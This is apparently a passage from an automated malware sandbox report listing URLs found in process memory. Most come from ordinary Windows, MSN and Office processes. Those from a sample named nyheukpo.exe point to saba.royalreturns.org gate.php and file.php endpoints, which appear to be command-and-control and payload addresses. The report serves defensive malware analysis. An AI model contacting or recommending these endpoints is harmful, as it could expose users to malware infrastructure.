                        Source: svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.coms
                        Source: explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                        Source: explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                        Source: explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                        Source: svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 00000004.00000000.1734626691.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2987599996.0000019E297F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                        Source: explorer.exe, 00000006.00000002.3047788765.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                        Source: explorer.exe, 00000006.00000002.3047788765.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                        Source: nyheukpo.exe, 00000001.00000003.2589353925.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2625696729.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
                        Source: explorer.exe, 00000006.00000002.3118529688.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                        Source: StartMenuExperienceHost.exe, 00000008.00000002.2943064332.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000008.00000000.1767023927.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcp
                        Source: SearchApp.exe, 0000000A.00000000.1810927939.0000024B42180000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcc.loki.delve.office.com/api
                        Source: SearchApp.exe, 0000000A.00000000.1810927939.0000024B42180000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api/
                        Source: svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                        Source: explorer.exe, 00000006.00000002.3047788765.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                        Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                        Source: svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
                        Source: svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
                        Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
                        Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
                        Source: StartMenuExperienceHost.exe, 00000008.00000000.1767108756.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000008.00000002.2948083184.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                        Source: explorer.exe, 00000006.00000002.3118529688.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                        Source: SearchApp.exe, 0000000A.00000000.1833309113.0000024B447CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
                        Source: SearchApp.exe, 0000000A.00000000.1936271503.0000024B59F50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
                        Source: SearchApp.exe, 0000000A.00000000.1872838014.0000024B5549B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/owa
                        Source: explorer.exe, 00000006.00000002.3118529688.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                        Source: StartMenuExperienceHost.exe, 00000008.00000002.2943064332.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000008.00000000.1767023927.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comxee
                        Source: nyheukpo.exe, 00000001.00000002.2981526929.0000000002EAB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturD
                        Source: nyheukpo.exe, 00000001.00000003.2578341398.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2508191877.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507970917.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2233840104.0000000000705000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2205551996.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2184984523.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578881496.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626813607.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2219902983.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/
                        Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/fi
                        Source: nyheukpo.exe, 00000001.00000002.2921848434.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.ph
                        Source: nyheukpo.exe, 00000001.00000002.2988344504.000000000326D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.php
                        Source: nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.php$N
                        Source: nyheukpo.exe, 00000001.00000003.2626813607.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578341398.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.000000000065E000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507970917.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.php2
                        Source: nyheukpo.exe, 00000001.00000003.2219425215.0000000000705000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2219770749.0000000000705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.php31232859Z
                        Source: nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.php3N
                        Source: nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.phpAN
                        Source: nyheukpo.exe, 00000001.00000003.2233840104.0000000000705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.phpC:
                        Source: nyheukpo.exe, 00000001.00000003.2626813607.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578341398.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.000000000065E000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507970917.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.phpN
                        Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.phpl
                        Source: nyheukpo.exe, 00000001.00000003.2626813607.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578341398.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507970917.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/file.phpv
                        Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.php
                        Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.php&
                        Source: nyheukpo.exe, 00000001.00000003.2589353925.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.php-
                        Source: nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.php2N
                        Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.php9210ef
                        Source: nyheukpo.exe, 00000001.00000003.2507855708.000000000072A000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.phpF
                        Source: nyheukpo.exe, 00000001.00000003.2626813607.00000000006B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.phpO
                        Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.phpU
                        Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507855708.000000000072A000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.phph=t
                        Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507855708.000000000072A000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.phpryptography
                        Source: nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/gate.phpturns.org/gate.php3ae9cd
                        Source: nyheukpo.exe, 00000001.00000003.2578341398.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2508191877.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507970917.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2205551996.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2184984523.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578881496.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626813607.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2219902983.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saba.royalreturns.org/oN
                        Source: SearchApp.exe, 0000000A.00000000.1849891462.0000024B54F6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://searchapp.bundleassets.example/desktop/2.htmlms-appx-web:///Cortana.UI/cache/svlocal/desktop
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                        Source: SearchApp.exe, 0000000A.00000000.1871452603.0000024B5542F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
                        Source: SearchApp.exe, 0000000A.00000000.1872021682.0000024B5546F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite
                        Source: SearchApp.exe, 0000000A.00000000.1872921243.0000024B5549F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
                        Source: SearchApp.exe, 0000000A.00000000.1936271503.0000024B59F50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/api/v2.0/Users(
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                        Source: explorer.exe, 00000006.00000002.3133456773.000000000CB31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/$
                        Source: explorer.exe, 00000006.00000002.3118529688.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                        Source: explorer.exe, 00000006.00000002.3118529688.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000008.00000002.2943064332.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000008.00000000.1767023927.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                        Source: SearchApp.exe, 0000000A.00000000.1812304098.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507855708.000000000072A000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Q
                        Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507855708.000000000072A000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/c
                        Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?gws_rd=ssl
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3047788765.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                        Source: explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
